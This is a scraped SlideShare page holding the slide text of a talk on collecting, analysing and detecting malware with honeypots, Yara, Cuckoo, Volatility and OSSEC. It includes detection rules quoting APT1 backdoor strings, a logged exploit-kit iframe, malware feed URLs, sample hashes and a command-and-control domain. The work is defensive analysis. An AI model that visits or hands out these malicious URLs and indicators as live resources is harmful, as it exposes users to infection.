SlideShare ist ein Scribd-Unternehmen logo

و کشف بد افزار OSSEC

Als PPTX, PDF herunterladen
M
milad saber

Malware detection with ossec

Serviceleistungen
1 von 32
Malware detection with OSSEC @santiagobassett
Setting up a malware lab Collection Analysis Detection @santiagobassett
MW collection techniques @santiagobassett Honeypots Web spiders - honeyclients Malware crawlers
Honeypot @santiagobassett Dionaea: Low interaction honeypot that emulates vulnerable network services. https://github.com/rep/dionaea (written in C) santiago@cuckoo:~$ nmap dionaea Starting Nmap 6.00 ( http://nmap.org ) at 2014-09-07 21:04 PDT Nmap scan report for dionaea (54.235.216.XXX) Host is up (0.070s latency). Not shown: 992 closed ports PORT STATE SERVICE 21/tcp open ftp 42/tcp open nameserver 80/tcp open http 135/tcp open msrpc 443/tcp open https 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 3306/tcp open mysql Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
Honeypot results @santiagobassett • Captured 126 unique binaries in 3 months • Highly detected by clamav (80%) santiago@dionaea:/opt/dionaea/var/dionaea/binaries# clamscan * 022aeb126d2d80e683f7f2a3ee920874: Trojan.Spy-78857 FOUND 05800e1eb163994359e4c946d4a0fecb: Backdoor.Floder-3 FOUND 06267149140c0bc9ba51222c165f2d61: Worm.Autorun-7683 FOUND 0682f3dfbdab7c040ac9307c50792d0a: Trojan.Buzus-9369 FOUND 074b815d9ded01b516a62e3b739caa10: Win.Trojan.Agent-372503 FOUND 07fea379703307c5addc20e237cdd0f0: Win.Trojan.Jorik-1388 FOUND 09481313331ff5a8b8bfa4e25cbaa524: Worm.Autorun-7516 FOUND 0a9f1cd12f1b34ca71fa585e87e91c7d: OK 0b4c4078231ee36731080858187a49b8: Win.Trojan.Injector-8166 FOUND 0feae931ee71a495614f14f3c1d37246: Trojan.Mybot-5073 FOUND 10ec7cb47314a2c08decb25e53fedcfa: Trojan.Injector-558 FOUND 1205a52e42687c922aa4d3700d778398: Trojan.Kazy-1372 FOUND 12fb7332920a7797c2d02df29b57c640: Trojan.Spy-78857 FOUND 16b0357b804d9651d9057b61d78bee08: Win.Trojan.Agent-368816 FOUND 1a813b6ea08a47f2997e2e4215eba96b: WIN.Trojan.IRCBot-1225 FOUND … ----------- SCAN SUMMARY ----------- Known viruses: 3517573 Engine version: 0.98.1 Scanned directories: 0 Scanned files: 126 Infected files: 101 Data scanned: 17.65 MB Data read: 18.11 MB (ratio 0.97:1) Time: 56.447 sec (0 m 56 s)
Honeyclient @santiagobassett Thug: Low interaction honeyclient, used to detect drive-by-download attacks. https://github.com/buffer/thug (Python) Thug emulates: • Core browser functionality • ActiveX controls • Browser plugins
Drive by download attack @santiagobassett http://urlquery.net/report.php?id=1410227505197
Honeyclient results @santiagobassett santiago@mwcollector:~/thug/src$ ./thug.py webgalleriet.no/ [2014-09-11 22:58:31] [HTTP] URL: http://www.webgalleriet.no/wordpress/wp-includes/js/comment- reply.js?ver=20090102 (Status: 200, Referrer: http://www.webgalleriet.no/) [2014-09-11 22:58:31] [HTTP] URL: http://www.webgalleriet.no/wordpress/wp-includes/js/comment- reply.js?ver=20090102 (Content-type: application/javascript, MD5: d484fa08997df765852c6ad283ec52c6) [2014-09-11 22:58:31] <iframe align="center" frameborder="no" height="2" name="Twitter" scrolling="auto" src="http://168bet.com/cocs.html?j=1095012" width="2"></iframe> [2014-09-11 22:58:31] [iframe redirection] http://www.webgalleriet.no/ -> http://168bet.com/cocs.html?j=1095012 [2014-09-11 22:58:31] [URL Classifier] URL: http://168bet.com/cocs.html?j=1095012 (Rule: Redkit 1, Classification: Landing page, Exploit Kit)
Malware crawlers @santiagobassett Retrieve files using malware tracking sites. https://github.com/technoskald/maltrieve (Python) https://code.google.com/p/malware-crawler/ (Python) http://malc0de.com/rss http://www.malwareblacklist.com/mbl.xml http://www.malwaredomainlist.com/hostslist/mdl.xml http://vxvault.siri-urz.net/URL_List.php http://urlquery.net/ http://support.clean-mx.de/clean-mx/xmlviruses.php
Malware tracking site
Malware crawlers results @santiagobassett • Captured 345 unique binaries in 15 minutes • Poorly detected by clamav (16%) santiago@mwcollector:~/binaries/maltrieve$ clamscan * 02d36dff08b63b123d2d2a36089e3d97: OK 03a6ac145099cf77bf5c7af127696687: OK 03e49fb415aacf9d2c90821ff0596024: OK 0568a72d4c5a2eb510207ca45b8d8799: OK 06ddb91e1d5f056590dfeef71a2da264: JS.Iframe-2 FOUND 074fbceca8fe84bae582a7a114b2ce94: HTML.Iframe-63 FOUND 0889504acc370f2adec7869b9bc5bc5c: OK 08d53833d032d71c1e7ffd3cddcd2a5e: JS.Iframe-2 FOUND 0ac790c459a0ef9bb4959321918a2d57: OK 0cc1c5c2ef510bd9f587abbc402d04a3: OK 0e3c692048a35c06ffe81a473ffd1d41: OK 136264a09b94bf8f08278b0045a84905: OK 13e78b2bab4a0ae9a3c2003d3f004dd1: JS.Obfus-31 FOUND ----------- SCAN SUMMARY ---------- - Known viruses: 3517100 Engine version: 0.98.4 Scanned directories: 0 Scanned files: 235 Infected files: 38 Data scanned: 164.24 MB Data read: 143.86 MB (ratio 1.14:1) Time: 254.462 sec (4 m 14 s)
Malware database - Viper @santiagobassett Binary analysis and management framework. https://github.com/botherder/viper (Python)
Static Analysis - Yara @santiagobassett Flexible, human-readable rules for identifying malicious streams. Can be used to analyze: • files • memory (volatility) • network streams. private rule APT1_RARSilent_EXE_PDF { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $winrar1 = "WINRAR.SFX" wide ascii $winrar2 = ";The comment below contains SFX script commands" wide ascii $winrar3 = "Silent=1" wide ascii $str1 = /Setup=[sw"]+.(exe|pdf|doc)/ $str2 = "Steup="" wide ascii condition: all of ($winrar*) and 1 of ($str*) }
Static Analysis - Yara @santiagobassett viper > find name 3f2fda43121d888428b66717b984a7fb +---+----------------------------------+-----------------------+----------------------------------+------+ | # | Name | Mime | MD5 | Tags | +---+----------------------------------+-----------------------+----------------------------------+------+ | 1 | 3F2FDA43121D888428B66717B984A7FB | application/x-dosexec | 3f2fda43121d888428b66717b984a7fb | apt | +---+----------------------------------+-----------------------+----------------------------------+------+ viper > open -l 1 [*] Session opened on /home/santiago/viper/binaries/6/a/f/2/6af2116c4b59c69917e0e25efe4530a127830e2ed383ea91e0eebfa1cae4b78e viper 3F2FDA43121D888428B66717B984A7FB > yara scan [*] Scanning 3F2FDA43121D888428B66717B984A7FB (6af2116c4b59c69917e0e25efe4530a127830e2ed383ea91e0eebfa1cae4b78e) +------------------+--------+--------+----------------------------------+ | Rule | String | Offset | Content | +------------------+--------+--------+----------------------------------+ | APT1_WEBC2_TABLE | $msg1 | 440032 | Fail To Execute The Command | | APT1_WEBC2_TABLE | $msg2 | 440060 | Execute The Command Successfully | | APT1_WEBC2_TABLE | $gif1 | 440100 | sdwefa.gif | | APT1_WEBC2_TABLE | $gif1 | 440101 | dwefa.gif | | APT1_WEBC2_TABLE | $gif1 | 440102 | wefa.gif | | APT1_WEBC2_TABLE | $gif1 | 440103 | efa.gif | | APT1_WEBC2_TABLE | $gif1 | 440104 | fa.gif | | APT1_WEBC2_TABLE | $gif1 | 440105 | a.gif | | APT1_WEBC2_TABLE | $gif2 | 440112 | GIF89 | +------------------+--------+--------+----------------------------------+ rule APT1_WEBC2_TABLE { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1" strings: $msg1 = "Fail To Execute The Command" wide ascii $msg2 = "Execute The Command Successfully" wide ascii $gif1 = /w+.gif/ $gif2 = "GIF89" wide ascii condition: 3 of them } viper 3F2FDA43121D888428B66717B984A7FB > yara rules +----+-----------------------------------+ | # | Path | +----+-----------------------------------+ | 1 | data/yara/hangover.yara | | 2 | data/yara/citizenlab.yara | | 3 | data/yara/APT_NGO_wuaclt_PDF.yara | | 4 | data/yara/kins.yara | | 5 | data/yara/themask.yara | | 6 | data/yara/vmdetect.yara | | 7 | data/yara/index.yara | | 8 | data/yara/GeorBotBinary.yara | | 9 | data/yara/leverage.yar | | 10 | data/yara/apt1.yara | | 11 | data/yara/GeorBotMemory.yara | | 12 | data/yara/rats.yara | | 13 | data/yara/embedded.yara | | 14 | data/yara/urausy_skypedat.yar | | 15 | data/yara/fpu.yara | +----+-----------------------------------+
Static Analysis – Trojan Dropper @santiagobassett viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe sections [*] PE Sections: +--------+---------+-------------+-------------+---------------+ | Name | RVA | VirtualSize | RawDataSize | Entropy | +--------+---------+-------------+-------------+---------------+ | .text | 0x1000 | 0xbe8f | 49152 | 6.52204488284 | | .rdata | 0xd000 | 0x1855 | 6656 | 5.17849300065 | | .data | 0xf000 | 0x19cb8 | 512 | 1.31023024266 | | .CRT | 0x29000 | 0x10 | 512 | 0.21310128451 | | .rsrc | 0x2a000 | 0x7fd8 | 32768 | 5.79943302325 | +--------+---------+-------------+-------------+---------------+ viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe imports ... [*] DLL: ADVAPI32.dll - 0x40d000: RegCloseKey - 0x40d004: RegOpenKeyExA - 0x40d008: RegQueryValueExA - 0x40d00c: RegCreateKeyExA - 0x40d010: RegSetValueExA ... viper 0A37D49E798F50C8F1010D5CFDE0E851 > pe compiletime [*] Compile Time: 2010-03-14 23:27:58 viper 0A37D49E798F50C8F1010D5CFDE0E851 > yara scan [*] Scanning 0A37D49E798F50C8F1010D5CFDE0E851 (dbf0436908c9d900e69ea2a108f08061786d299b511265b78620a4401361084b) viper 0A37D49E798F50C8F1010D5CFDE0E851 > fuzzy [*] 1 relevant matches found +-------+----------------------------------+------------------------------------------------------------------+ | Score | Name | SHA256 | +-------+----------------------------------+------------------------------------------------------------------+ | 68% | 003EE3D21DF82975337AE976F8BA67CC | 2803fba5fbe908f6151597c2a387caef8f00a5f0f194bfc6b4d9f89026d53621 | +-------+----------------------------------+------------------------------------------------------------------+ viper 0A37D49E798F50C8F1010D5CFDE0E851 > virustotal [*] VirusTotal Report: +----------------------+---------------------------------------------- + | Antivirus | Signature | +----------------------+---------------------------------------------- + | nProtect | Trojan.Downloader.JKVR | | McAfee | Artemis!0A37D49E798F | | K7GW | Trojan-Downloader | | NANO-Antivirus | Trojan.Win32.Agent.hbmsz | | Symantec | Downloader | | TotalDefense | Win32/FakeDoc_i | | TrendMicro-HouseCall | TROJ_DLOADER.VTG | | Avast | Win32:Trojan-gen | | ClamAV | Trojan.Downloader-83571 | | Kaspersky | Trojan-Downloader.Win32.Agent.thb | | BitDefender | Trojan.Downloader.JKVR | | Agnitum | Trojan.DL.Agent!virRS0ijj7k | | Emsisoft | Trojan.Downloader.JKVR (B) | | Comodo | TrojWare.Win32.TrojanDownloader.Agent.thb_30 | | F-Secure | Trojan.Downloader.JKVR | | TrendMicro | TROJ_DLOADER.VTG | | McAfee-GW-Edition | Artemis!0A37D49E798F | | Sophos | Troj/DwnLdr-IYR | | Jiangmin | TrojanDownloader.Agent.boly | | Antiy-AVL | Trojan/Win32.Agent.gen | | Microsoft | TrojanDownloader:Win32/Pingbed.A | | Commtouch | W32/Downloader.NIHT-8726 | | AhnLab-V3 | Dropper/Malware.101512
Fuzzy hash match info @santiagobassett
Dynamic Analysis - Cuckoo @santiagobassett Automated malware analysis. Runs binary files in virtual machines to study their behavior. • Traces Win32 API calls • Files created, deleted and downloaded • Memory dumps of malicious processes • Network traffic pcaps Integrated with yara, virustotal and volatility among other tools. Supports Virtualbox KVM and Vmware.
Dynamic Analysis – Trojan Dropper @santiagobassett
Behavioral Analysis – Filesystem @santiagobassett
Behavioral Analysis - Filesystem @santiagobassett
Behavioral Analysis – Network @santiagobassett
Behavioral Analysis – Network @santiagobassett
Behavioral Analysis - Network @santiagobassett santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ sudo tcpdump -s 0 -XX -AA -nn -r dump.pcap | grep -A 4 63.233.155.6 reading from file dump.pcap, link-type EN10MB (Ethernet) 23:32:20.655808 IP 8.8.8.8.53 > 192.168.56.103.63943: 53551 1/0/0 A 63.233.155.6 (50) 0x0000: 0800 2723 f165 0a00 2700 0000 0800 4500 ..'#.e..'.....E. 0x0010: 004e eca8 0000 2d11 97d7 0808 0808 c0a8 .N....-......... 0x0020: 3867 0035 f9c7 003a ef52 d12f 8180 0001 8g.5...:.R./.... 0x0030: 0001 0000 0000 0377 7777 0867 6172 7968 .......www.garyh -- 23:32:20.662766 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0 0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E. 0x0010: 0034 10ab 4000 8006 161a c0a8 3867 3fe9 .4..@.......8g?. 0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 8002 .....P..<....... 0x0030: 2000 e231 0000 0204 05b4 0103 0302 0101 ...1............ -- 23:32:23.663174 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0 0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E. 0x0010: 0034 10c2 4000 8006 1603 c0a8 3867 3fe9 .4..@.......8g?. 0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 8002 .....P..<....... 0x0030: 2000 e231 0000 0204 05b4 0103 0302 0101 ...1............ -- 23:32:29.661778 IP 192.168.56.103.49166 > 63.233.155.6.80: Flags [S], seq 2615622815, win 8192, options [mss 1460,nop,nop,sackOK], length 0 0x0000: 0a00 2700 0000 0800 2723 f165 0800 4500 ..'.....'#.e..E. 0x0010: 0030 10dc 4000 8006 15ed c0a8 3867 3fe9 .0..@.......8g?. 0x0020: 9b06 c00e 0050 9be7 3c9f 0000 0000 7002 .....P..<.....p. 0x0030: 2000 f63a 0000 0204 05b4 0101 0402 ...:..........
Behavioral Analysis – Registry @santiagobassett
Memory Analysis - Volatility @santiagobassett santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ vol.py psxview --profile=Win7SP1x86 -f memory.dmp Volatility Foundation Volatility Framework 2.4 Offset(P) Name PID pslist psscan thrdproc pspcid csrss session deskthrd ---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- 0x7b6fa500 audiodg.exe 960 True False True True True True True 0x7b7afd40 sppsvc.exe 1780 True False True True True True True 0x779fb808 svchost.exe 724 True False True True True True True 0x7b7be710 svchost.exe 1892 True False True True True True True 0x7c4ea7d8 VBoxService.ex 624 True False True True True True True 0x7b6f4030 svchost.exe 900 True False True True True True True 0x7b7bb618 svchost.exe 3376 True False True True True True True 0x7cd99a58 AcroRD32.exe 3080 True False True True True True True 0x7b4fa030 SearchIndexer. 360 True False True True True True True 0x7b94a858 taskhost.exe 2920 True False True True True True True … santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ vol.py memdump --profile=Win7SP1x86 -f memory.dmp -D ./ -p 3080 Volatility Foundation Volatility Framework 2.4 ************************************************************************ Writing AcroRD32.exe [ 3080] to 3080.dmp santiago@cuckoo:~$ strings 3080.dmp | grep -i garyhart www.garyhart.com w.garyhart.com w.garyhart.com w.garyhart.com www.garyhart.com st: www.garyhart.com w.garyhart.com tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm tp://www.garyhart.com/nfuse.htm www.garyhart.com http://www.garyhart.com/nfuse.htm
Memory Analysis - Yara @santiagobassett santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ yara /home/santiago/viper/data/yara/apt1.yara 3080.dmp APT1_WEBC2_UGX 3080.dmp rule APT1_WEBC2_UGX { meta: author = "AlienVault Labs" info = "CommentCrew-threat-apt1” strings: $persis = "SOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN" wide ascii $exe = "DefWatch.exe" wide ascii $html = "index1.html" wide ascii $cmd1 = "!@#tiuq#@!" wide ascii $cmd2 = "!@#dmc#@!" wide ascii $cmd3 = "!@#troppusnu#@!" wide ascii condition: 3 of them }
OSSEC - Rootcheck @santiagobassett Used for rootkits and malware detection. It can be used to: • Look for suspicious files. • Inspect files and registry keys for common rootkits/malware entries. • Look for hidden processes and network ports.
OSSEC – Rule for Trojan Dropper @santiagobassett [Trojan Dropper] [all] [0A37D49E798F50C8F1010D5CFDE0E851] f:C:UsersIEUserAppDataLocalTempAcroRD32.exe; r:HKEY_USERSS-1-5-21-3463664321-2923530833-3546627382-1000 SoftwareMicrosoftWindowsCurrentVersionRun -> Acroread -> r:AcroRD32.exe; p:r:AcroRD32.exe; /var/ossec/etc/shared/win_malware_rcl.txt
OSSEC – Alert for Trojan Dropper @santiagobassett alienvault:/var/ossec/bin# ./rootcheck_control -L -i 001 Policy and auditing events for agent 'Windows7 (001) - 172.16.126.134': Resolved events: ** No entries found. Last scan: 2014 Sep 12 18:54:24 Windows Audit: Null sessions allowed. Windows Malware: Trojan Dropper. File: C:UsersIEUserAppDataLocalTempAcroRD32.exe. Reference: 0A37D49E798F50C8F1010D5CFDE0E851 .
Demo – Alert for Trojan Dropper @santiagobassett
Future Work @santiagobassett • Use/create Cuckoo signatures to identify different malware patterns (droppers, downloaders, trojans, rootkits, …) • Create Cuckoo reporting module to report (JSON) on those patterns that OSSEC can detect. • Python tool to parse module output and generate rootcheck rules. • Add/improve OSSEC malware detection capabilities.
Thank you! santiago@alienvault.com @santiagobassett

Empfohlen

Monitoring and Logging in Wonderland
Monitoring and Logging in WonderlandMonitoring and Logging in Wonderland
Monitoring and Logging in WonderlandPaul Seiffert
 
Finding Evil In DNS Traffic
Finding Evil In DNS TrafficFinding Evil In DNS Traffic
Finding Evil In DNS Trafficreal_slacker007
 
Finding target for hacking on internet is now easier
Finding target for hacking on internet is now easierFinding target for hacking on internet is now easier
Finding target for hacking on internet is now easierDavid Thomas
 
Salt Cryptography & Cracking Salted Hashes by fb1h2s
Salt Cryptography & Cracking Salted Hashes by fb1h2sSalt Cryptography & Cracking Salted Hashes by fb1h2s
Salt Cryptography & Cracking Salted Hashes by fb1h2sn|u - The Open Security Community
 
Handy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemHandy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemSneha Inguva
 
IstSec'14 - Onur ALANBEL - ShellShock
IstSec'14 - Onur ALANBEL - ShellShockIstSec'14 - Onur ALANBEL - ShellShock
IstSec'14 - Onur ALANBEL - ShellShockBGA Cyber Security
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoTiago Cruz
 
ULA network experience @ JANOG34, by Shishio Tsuchiya [APNIC 38 / APIPv6TF]
ULA network experience @ JANOG34, by Shishio Tsuchiya [APNIC 38 / APIPv6TF]ULA network experience @ JANOG34, by Shishio Tsuchiya [APNIC 38 / APIPv6TF]
ULA network experience @ JANOG34, by Shishio Tsuchiya [APNIC 38 / APIPv6TF]APNIC
 

Empfohlen

Monitoring and Logging in Wonderland
Monitoring and Logging in WonderlandMonitoring and Logging in Wonderland
Monitoring and Logging in WonderlandPaul Seiffert
 
Finding Evil In DNS Traffic
Finding Evil In DNS TrafficFinding Evil In DNS Traffic
Finding Evil In DNS Trafficreal_slacker007
 
Finding target for hacking on internet is now easier
Finding target for hacking on internet is now easierFinding target for hacking on internet is now easier
Finding target for hacking on internet is now easierDavid Thomas
 
Salt Cryptography & Cracking Salted Hashes by fb1h2s
Salt Cryptography & Cracking Salted Hashes by fb1h2sSalt Cryptography & Cracking Salted Hashes by fb1h2s
Salt Cryptography & Cracking Salted Hashes by fb1h2sn|u - The Open Security Community
 
Handy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemHandy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemSneha Inguva
 
IstSec'14 - Onur ALANBEL - ShellShock
IstSec'14 - Onur ALANBEL - ShellShockIstSec'14 - Onur ALANBEL - ShellShock
IstSec'14 - Onur ALANBEL - ShellShockBGA Cyber Security
 
SSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoSSH: Seguranca no Acesso Remoto
SSH: Seguranca no Acesso RemotoTiago Cruz
 
ULA network experience @ JANOG34, by Shishio Tsuchiya [APNIC 38 / APIPv6TF]
ULA network experience @ JANOG34, by Shishio Tsuchiya [APNIC 38 / APIPv6TF]ULA network experience @ JANOG34, by Shishio Tsuchiya [APNIC 38 / APIPv6TF]
ULA network experience @ JANOG34, by Shishio Tsuchiya [APNIC 38 / APIPv6TF]APNIC
 
Ipso vrrp troubleshooting
Ipso vrrp troubleshootingIpso vrrp troubleshooting
Ipso vrrp troubleshootingPavan Kumar
 
Stu t17 a
Stu t17 aStu t17 a
Stu t17 aSelectedPresentations
 
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacks
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacksDEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacks
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacksFelipe Prado
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloudrandomuserid
 
Active proxied sessions
Active proxied sessionsActive proxied sessions
Active proxied sessionsds5ysm
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Unix Monitoring Tools
Unix Monitoring ToolsUnix Monitoring Tools
Unix Monitoring ToolsSEA Tecnologia
 
Algosec how to avoid business outages from misconfigured devices final
Algosec how to avoid business outages from misconfigured devices finalAlgosec how to avoid business outages from misconfigured devices final
Algosec how to avoid business outages from misconfigured devices finalMaytal Levi
 
Sap snc configuration
Sap snc configurationSap snc configuration
Sap snc configurationSugianto S.Kom
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Ontico
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Андрей Шорин
 
True stories on the analysis of network activity using Python
True stories on the analysis of network activity using PythonTrue stories on the analysis of network activity using Python
True stories on the analysis of network activity using Pythondelimitry
 
Pasteur deep seq_analysis_theory_2016
Pasteur deep seq_analysis_theory_2016Pasteur deep seq_analysis_theory_2016
Pasteur deep seq_analysis_theory_2016Christophe Antoniewski
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
 
Vpn 3854d825
Vpn 3854d825Vpn 3854d825
Vpn 3854d825Hatus Cordeiro
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsNapier University
 
DMVPN Lab WorkBook
DMVPN Lab WorkBookDMVPN Lab WorkBook
DMVPN Lab WorkBookRHC Technologies
 
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Jordi Cabot
 
Openssl
OpensslOpenssl
OpensslAdam Moravcik
 
Triển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gponTriển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gponlaonap166
 
Wardrobe
WardrobeWardrobe
WardrobeDouglas Anderson
 
Jose marc3ada-mellado
Jose marc3ada-melladoJose marc3ada-mellado
Jose marc3ada-melladomariajimenezsevilla
 

Weitere ähnliche Inhalte

Was ist angesagt?

Ipso vrrp troubleshooting
Ipso vrrp troubleshootingIpso vrrp troubleshooting
Ipso vrrp troubleshootingPavan Kumar
 
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacks
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacksDEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacks
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacksFelipe Prado
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloudrandomuserid
 
Active proxied sessions
Active proxied sessionsActive proxied sessions
Active proxied sessionsds5ysm
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
Algosec how to avoid business outages from misconfigured devices final
Algosec how to avoid business outages from misconfigured devices finalAlgosec how to avoid business outages from misconfigured devices final
Algosec how to avoid business outages from misconfigured devices finalMaytal Levi
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Ontico
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Андрей Шорин
 
True stories on the analysis of network activity using Python
True stories on the analysis of network activity using PythonTrue stories on the analysis of network activity using Python
True stories on the analysis of network activity using Pythondelimitry
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
 
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsNapier University
 
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)
Model-driven Extraction and Analysis of Network Security Policies (at MoDELS'13)Jordi Cabot
 
Triển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gponTriển khai vpn client to site qua router gpon
Triển khai vpn client to site qua router gponlaonap166
 

Was ist angesagt? (20)

Ipso vrrp troubleshooting
Ipso vrrp troubleshootingIpso vrrp troubleshooting
Ipso vrrp troubleshooting
 
Stu t17 a
Stu t17 aStu t17 a
Stu t17 a
 
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacks
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacksDEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacks
DEFCON 23 - Jose Selvi - Breaking SSL using time synchronisation attacks
 
Engineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the CloudEngineering Challenges Doing Intrusion Detection in the Cloud
Engineering Challenges Doing Intrusion Detection in the Cloud
 
Active proxied sessions
Active proxied sessionsActive proxied sessions
Active proxied sessions
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
Unix Monitoring Tools
Unix Monitoring ToolsUnix Monitoring Tools
Unix Monitoring Tools
 
Algosec how to avoid business outages from misconfigured devices final
Algosec how to avoid business outages from misconfigured devices finalAlgosec how to avoid business outages from misconfigured devices final
Algosec how to avoid business outages from misconfigured devices final
 
Sap snc configuration
Sap snc configurationSap snc configuration
Sap snc configuration
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
 
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...
 
True stories on the analysis of network activity using Python
True stories on the analysis of network activity using PythonTrue stories on the analysis of network activity using Python
True stories on the analysis of network activity using Python
 
Pasteur deep seq_analysis_theory_2016
Pasteur deep seq_analysis_theory_2016Pasteur deep seq_analysis_theory_2016
Pasteur deep seq_analysis_theory_2016
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
